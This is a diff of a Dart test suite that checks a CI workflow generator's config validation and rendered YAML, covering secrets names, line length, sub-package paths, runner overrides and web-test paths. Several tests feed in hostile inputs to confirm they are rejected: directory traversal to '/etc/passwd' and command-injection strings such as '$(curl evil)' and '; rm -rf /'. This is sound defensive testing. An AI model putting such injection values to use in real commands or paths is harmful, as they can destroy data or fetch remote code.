expect(errors, anyElement(contains('invalid platform "solaris"'))); }); @@ -232,16 +189,12 @@ void main() { }); test('valid single platform passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu'])); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); test('valid multi-platform passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu', 'macos', 'windows']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'macos', 'windows'])); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); @@ -266,58 +219,42 @@ void main() { }); test('valid secrets map passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'SOME_SECRET'})); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); test('secrets key with hyphen produces error (unsafe identifier)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API-KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API-KEY': 'SOME_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets key starting with digit produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'1API_KEY': 'SOME_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'1API_KEY': 'SOME_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets value with hyphen produces error (unsafe secret name)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'SOME-SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'SOME-SECRET'})); expect(errors, anyElement(contains('safe secret name'))); }); test('secrets key and value with underscore pass', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'MY_SECRET_NAME'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'MY_SECRET_NAME'})); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); test('secrets key with leading underscore produces error (must start with uppercase letter)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'_API_KEY': 'MY_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'_API_KEY': 'MY_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets key with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'api_key': 'MY_SECRET'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'api_key': 'MY_SECRET'})); expect(errors, anyElement(contains('safe identifier'))); }); test('secrets value with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(secrets: {'API_KEY': 'my_secret'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(secrets: {'API_KEY': 'my_secret'})); expect(errors, anyElement(contains('safe secret name'))); }); }); @@ -338,55 +275,36 @@ void main() { test('valid pat passes', () { final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY_PAT')); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('null pat is fine (optional, defaults to GITHUB_TOKEN)', () { final errors = WorkflowGenerator.validate(_validConfig()); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('pat with hyphen produces error (unsafe identifier)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'MY-PAT'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY-PAT')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat with special chars produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: r'MY_PAT$'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: r'MY_PAT$')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat GITHUB_TOKEN passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'GITHUB_TOKEN'), - ); - expect( - errors.where((e) => e.contains('personal_access_token_secret')), - isEmpty, - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: 'GITHUB_TOKEN')); + expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); }); test('pat with leading underscore produces error (must start with uppercase letter)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: '_MY_PAT'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: '_MY_PAT')); expect(errors, anyElement(contains('safe identifier'))); }); test('pat with lowercase produces error (uppercase only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(pat: 'my_pat'), - ); + final errors = WorkflowGenerator.validate(_validConfig(pat: 'my_pat')); expect(errors, anyElement(contains('safe identifier'))); }); }); @@ -394,9 +312,7 @@ void main() { // ---- line_length ---- group('line_length', () { test('non-numeric line_length produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: true), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: true)); expect(errors, anyElement(contains('line_length'))); }); @@ -406,9 +322,7 @@ void main() { }); test('string line_length passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '120')); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); @@ -418,52 +332,37 @@ void main() { }); test('string line_length "abc" produces error (must be digits only)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: 'abc'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 'abc')); expect(errors, anyElement(contains('digits only'))); }); test('string line_length "+120" produces error (digits only, no sign)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '+120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '+120')); expect(errors, anyElement(contains('digits only'))); }); test('string line_length "-120" produces error (digits only, no sign)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '-120'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '-120')); expect(errors, anyElement(contains('digits only'))); }); - test('string line_length with leading/trailing whitespace produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: ' 120 '), - ); + test('string line_length with leading/trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate(_validConfig(lineLength: ' 120 ')); expect(errors, anyElement(contains('whitespace'))); }); test('string line_length with embedded newline produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '12\n0'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '12\n0')); expect(errors, anyElement(contains('newlines or control'))); }); test('string line_length "0" produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '0'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '0')); expect(errors, anyElement(contains('between 1 and 10000'))); }); test('string line_length "10001" produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: '10001'), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '10001')); expect(errors, anyElement(contains('between 1 and 10000'))); }); @@ -473,9 +372,7 @@ void main() { }); test('int line_length 10001 produces error (out of range)', () { - final errors = WorkflowGenerator.validate( - _validConfig(lineLength: 10001), - ); + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 10001)); expect(errors, anyElement(contains('between 1 and 10000'))); }); }); @@ -490,13 +387,8 @@ void main() { }); test('sub_packages entry that is not a map produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: ['just_a_string']), - ); - expect( - errors, - anyElement(contains('sub_packages entries must be objects')), - ); + final errors = WorkflowGenerator.validate(_validConfig(subPackages: ['just_a_string'])); + expect(errors, anyElement(contains('sub_packages entries must be objects'))); }); test('sub_packages with missing name produces error', () { @@ -554,22 +446,16 @@ void main() { expect(errors, anyElement(contains('path must be a non-empty string'))); }); - test( - 'sub_packages path with directory traversal (..) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': '../../../etc/passwd'}, - ], - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + test('sub_packages path with directory traversal (..) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '../../../etc/passwd'}, + ], + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); test('sub_packages path with embedded traversal produces error', () { final errors = WorkflowGenerator.validate( @@ -579,10 +465,7 @@ void main() { ], ), ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); }); test('sub_packages absolute path produces error', () { @@ -651,19 +534,16 @@ void main() { expect(errors, anyElement(contains('unsupported characters'))); }); - test( - 'sub_packages path with leading/trailing whitespace produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': ' packages/foo '}, - ], - ), - ); - expect(errors, anyElement(contains('whitespace'))); - }, - ); + test('sub_packages path with leading/trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ' packages/foo '}, + ], + ), + ); + expect(errors, anyElement(contains('whitespace'))); + }); test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. @@ -677,20 +557,17 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); - test( - 'sub_packages path with embedded tab triggers newlines/tabs error', - () { - // Embedded tab: trim() is identity, so newlines/tabs check catches it. - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': 'packages/f\too'}, - ], - ), - ); - expect(errors, anyElement(contains('newlines/tabs'))); - }, - ); + test('sub_packages path with embedded tab triggers newlines/tabs error', () { + // Embedded tab: trim() is identity, so newlines/tabs check catches it. + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/f\too'}, + ], + ), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); test('sub_packages duplicate name produces error', () { final errors = WorkflowGenerator.validate( @@ -704,20 +581,17 @@ void main() { expect(errors, anyElement(contains('duplicate name "foo"'))); }); - test( - 'sub_packages duplicate path (after normalization) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'bar', 'path': 'packages/./foo'}, - ], - ), - ); - expect(errors, anyElement(contains('duplicate path'))); - }, - ); + test('sub_packages duplicate path (after normalization) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'bar', 'path': 'packages/./foo'}, + ], + ), + ); + expect(errors, anyElement(contains('duplicate path'))); + }); test('valid sub_packages passes', () { final errors = WorkflowGenerator.validate( @@ -743,73 +617,52 @@ void main() { final config = _validConfig(); config['runner_overrides'] = 'invalid'; final errors = WorkflowGenerator.validate(config); - expect( - errors, - anyElement(contains('runner_overrides must be an object')), - ); + expect(errors, anyElement(contains('runner_overrides must be an object'))); }); test('runner_overrides with invalid platform key produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'solaris': 'my-runner'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'solaris': 'my-runner'})); expect(errors, anyElement(contains('invalid platform key "solaris"'))); }); test('runner_overrides with empty string value produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': ''}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': ''})); expect(errors, anyElement(contains('must be a non-empty string'))); }); test('runner_overrides value with surrounding whitespace produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': ' custom-runner '}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': ' custom-runner '})); expect(errors, anyElement(contains('leading/trailing whitespace'))); }); test('valid runner_overrides passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'})); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); test('runner_overrides value with newline produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'})); expect(errors, anyElement(contains('newlines, control chars'))); }); test('runner_overrides value with tab produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'runner\tlabel'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner\tlabel'})); expect(errors, anyElement(contains('newlines, control chars'))); }); test('runner_overrides value with YAML-injection char produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': 'runner:label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': 'runner:label'})); expect(errors, anyElement(contains('unsafe YAML chars'))); }); test('runner_overrides value with dollar sign produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(runnerOverrides: {'ubuntu': r'runner$label'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(runnerOverrides: {'ubuntu': r'runner$label'})); expect(errors, anyElement(contains('unsafe YAML chars'))); }); test('runner_overrides value with hyphen and dot passes', () { final errors = WorkflowGenerator.validate( - _validConfig( - runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}, - ), + _validConfig(runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}), ); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); @@ -830,68 +683,49 @@ void main() { }); test('web_test.concurrency non-int produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 'fast'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 'fast'})); expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency zero produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 0}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 0})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency negative produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': -1}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': -1})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency exceeds upper bound produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 33}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 33})); expect(errors, anyElement(contains('between 1 and 32'))); }); test('web_test.concurrency double/float produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 3.14}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 3.14})); expect(errors, anyElement(contains('concurrency must be an integer'))); }); test('web_test.concurrency valid int passes', () { final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: {'concurrency': 4}, - ), + _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}, webTest: {'concurrency': 4}), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); test('web_test.concurrency at upper bound (32) passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'concurrency': 32}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'concurrency': 32})); expect(errors.where((e) => e.contains('concurrency')), isEmpty); }); test('web_test.concurrency null is fine (defaults to 1)', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {})); expect(errors.where((e) => e.contains('concurrency')), isEmpty); }); test('web_test.paths non-list produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: {'paths': 'not_a_list'}), - ); + final errors = WorkflowGenerator.validate(_validConfig(webTest: {'paths': 'not_a_list'})); expect(errors, anyElement(contains('paths must be an array'))); }); @@ -925,57 +759,42 @@ void main() { }, ), ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }); - - test( - 'web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: { - 'paths': ['test/web/../../../etc/passwd'], - }, - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); - test( - 'web_test.paths with shell metacharacters (\$(curl evil)) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': [r'$(curl evil)'], - }, - ), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }, - ); + test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../../etc/passwd'], + }, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); - test( - 'web_test.paths with shell metacharacters (; rm -rf /) produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': ['; rm -rf /'], - }, - ), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }, - ); + test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': [r'$(curl evil)'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['; rm -rf /'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); test('web_test.paths with single quote produces error', () { final errors = WorkflowGenerator.validate( @@ -1077,22 +896,16 @@ void main() { expect(errors, anyElement(contains('newlines/tabs'))); }); - test( - 'web_test.paths with embedded traversal that escapes repo produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - webTest: { - 'paths': ['test/../../../etc/passwd'], - }, - ), - ); - expect( - errors, - anyElement(contains('must not traverse outside the repo')), - ); - }, - ); + test('web_test.paths with embedded traversal that escapes repo produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['test/../../../etc/passwd'], + }, + ), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); test('web_test.paths with embedded .. that stays in repo is fine', () { // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) @@ -1187,10 +1000,7 @@ void main() { test('empty web_test.paths list is fine', () { final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: {'paths': []}, - ), + _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}, webTest: {'paths': []}), ); expect(errors.where((e) => e.contains('web_test')), isEmpty); }); @@ -1215,65 +1025,42 @@ void main() { expect(errors, anyElement(contains('unknown key "concurreny"'))); }); - test( - 'cross-validation: web_test config present but feature disabled produces error', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': false}, - webTest: { - 'concurrency': 2, - 'paths': ['test/web/'], - }, - ), - ); - expect( - errors, - anyElement( - contains( - 'web_test config is present but ci.features.web_test is not enabled', - ), - ), - ); - }, - ); - - test( - 'cross-validation: web_test feature enabled but config wrong type produces error', - () { - final config = _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = 'yes'; - final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('web_test must be an object'))); - }, - ); + test('cross-validation: web_test config present but feature disabled produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); + expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); + }); - test( - 'cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', - () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - // webTest: null (omitted) — config is optional when feature is enabled - ), - ); - expect(errors.where((e) => e.contains('web_test')), isEmpty); - }, - ); + test('cross-validation: web_test feature enabled but config wrong type produces error', () { + final config = _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); - test( - 'cross-validation: web_test feature enabled with explicit null config is allowed', - () { - final config = _validConfig( + test('cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', () { + final errors = WorkflowGenerator.validate( + _validConfig( features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = null; - final errors = WorkflowGenerator.validate(config); - expect(errors.where((e) => e.contains('web_test')), isEmpty); - }, - ); + // webTest: null (omitted) — config is optional when feature is enabled + ), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('cross-validation: web_test feature enabled with explicit null config is allowed', () { + final config = _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true}); + config['web_test'] = null; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); }); // ---- fully valid config produces no errors ---- @@ -1331,9 +1118,7 @@ void main() { test('returns null when config.json exists but has no "ci" key', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'repo_name': 'test_repo'})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'repo_name': 'test_repo'})); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNull); }); @@ -1357,35 +1142,19 @@ void main() { test('throws StateError on malformed JSON', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync('{ not valid json'); + File('${configDir.path}/config.json').writeAsStringSync('{ not valid json'); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA( - isA().having( - (e) => e.message, - 'message', - contains('Malformed JSON'), - ), - ), + throwsA(isA().having((e) => e.message, 'message', contains('Malformed JSON'))), ); }); test('throws StateError when "ci" is not a Map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': 'not_a_map'})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': 'not_a_map'})); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA( - isA().having( - (e) => e.message, - 'message', - contains('object'), - ), - ), + throwsA(isA().having((e) => e.message, 'message', contains('object'))), ); }); @@ -1396,10 +1165,7 @@ void main() { 'ci': [1, 2, 3], }), ); - expect( - () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA()), - ); + expect(() => WorkflowGenerator.loadCiConfig(tempDir.path), throwsA(isA())); }); }); @@ -1436,58 +1202,37 @@ void main() { } // ---- render() validation guard (defense-in-depth) ---- - test( - 'render throws StateError when config is invalid (missing dart_sdk)', - () { - final gen = WorkflowGenerator( - ciConfig: {'features': {}}, - toolingVersion: '0.0.0-test', - ); - expect( - () => gen.render(), - throwsA( - isA().having( - (e) => e.message, - 'message', - allOf( - contains('Cannot render with invalid config'), - contains('dart_sdk'), - ), - ), + test('render throws StateError when config is invalid (missing dart_sdk)', () { + final gen = WorkflowGenerator(ciConfig: {'features': {}}, toolingVersion: '0.0.0-test'); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf(contains('Cannot render with invalid config'), contains('dart_sdk')), ), - ); - }, - ); + ), + ); + }); - test( - 'render throws StateError when config has multiple validation errors', - () { - final gen = WorkflowGenerator( - ciConfig: {}, - toolingVersion: '0.0.0-test', - ); - expect( - () => gen.render(), - throwsA( - isA().having( - (e) => e.message, - 'message', - allOf( - contains('Cannot render with invalid config'), - contains('dart_sdk'), - contains('features'), - ), - ), + test('render throws StateError when config has multiple validation errors', () { + final gen = WorkflowGenerator(ciConfig: {}, toolingVersion: '0.0.0-test'); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf(contains('Cannot render with invalid config'), contains('dart_sdk'), contains('features')), ), - ); - }, - ); + ), + ); + }); test('render throws StateError when config has invalid web_test type', () { final gen = WorkflowGenerator( - ciConfig: _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - )..['web_test'] = 'yes', + ciConfig: _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true})..['web_test'] = 'yes', toolingVersion: '0.0.0-test', ); expect( @@ -1496,49 +1241,42 @@ void main() { isA().having( (e) => e.message, 'message', - allOf( - contains('Cannot render with invalid config'), - contains('web_test must be an object'), - ), + allOf(contains('Cannot render with invalid config'), contains('web_test must be an object')), ), ), ); }); test('render succeeds on valid config', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test'); final rendered = gen.render(); expect(rendered, isNotEmpty); - expect(rendered, contains('name:')); + final parsed = loadYaml(rendered) as YamlMap; + expect(parsed, isA()); + expect(parsed.containsKey('name'), isTrue); + expect(parsed['name'], equals('CI')); + expect(parsed.containsKey('jobs'), isTrue); + final jobs = parsed['jobs'] as YamlMap; + expect(jobs, isA()); + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isTrue); }); test('web_test=false: rendered output does not contain web-test job', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test'); final rendered = gen.render(); expect(rendered, isNot(contains('web-test:'))); expect(rendered, isNot(contains('dart test -p chrome'))); }); - test( - 'web_test=true with omitted config uses default concurrency and no explicit paths', - () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), - toolingVersion: '0.0.0-test', - ); - final rendered = gen.render(); - expect(rendered, contains('web-test:')); - expect(rendered, contains('dart test -p chrome')); - expect(rendered, contains('--concurrency=1')); - expect(rendered, isNot(contains("'test/"))); - }, - ); + test('web_test=true with omitted config uses default concurrency and no explicit paths', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + expect(rendered, contains('--concurrency=1')); + expect(rendered, isNot(contains("'test/"))); + }); test('web_test=true with paths: rendered output includes path args', () { final gen = WorkflowGenerator( @@ -1557,30 +1295,67 @@ void main() { expect(rendered, contains('-- \'test/web/foo_test.dart\'')); }); - test( - 'web_test=true with concurrency at upper bound (32): rendered output uses 32', - () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - webTestConfig: {'concurrency': 32}, - ), - toolingVersion: '0.0.0-test', - ); - final rendered = gen.render(); - expect(rendered, contains('--concurrency=32')); - }, - ); - - test('rendered output parses as valid YAML with jobs map', () { + test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), + ciConfig: _minimalValidConfig(webTest: true, webTestConfig: {'concurrency': 32}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }); + + test('rendered output parses as valid YAML with jobs map', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; + + expect(parsed.containsKey('name'), isTrue); + expect(parsed['name'], equals('CI')); + + final on = parsed['on'] as YamlMap; + expect(on.containsKey('push'), isTrue); + expect(on.containsKey('pull_request'), isTrue); + final pushBranches = (on['push'] as YamlMap)['branches'] as YamlList; + expect(pushBranches, contains('main')); + final jobs = parsed['jobs'] as YamlMap; expect(jobs.containsKey('pre-check'), isTrue); + + final preCheck = jobs['pre-check'] as YamlMap; + expect(preCheck['runs-on'], equals('ubuntu-latest')); + final steps = preCheck['steps'] as YamlList; + expect(steps.length, greaterThanOrEqualTo(2)); + final firstStep = steps[0] as YamlMap; + expect('${firstStep['uses']}', contains('actions/checkout')); + }); + + test('managed_test: upload step uses success() || failure() not cancelled', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('success() || failure()')); + expect(rendered, isNot(contains('always()'))); + }); + + test('managed_test: Test step has pipefail and tee for correct exit propagation', () { + // Single-platform and multi-platform must share identical test step + // structure: pipefail ensures test exit code propagates through tee. + final single = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu']), + toolingVersion: '0.0.0-test', + ).render(); + final multi = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu', 'macos']), + toolingVersion: '0.0.0-test', + ).render(); + for (final rendered in [single, multi]) { + expect(rendered, contains('set -o pipefail')); + expect(rendered, contains('tee "')); + 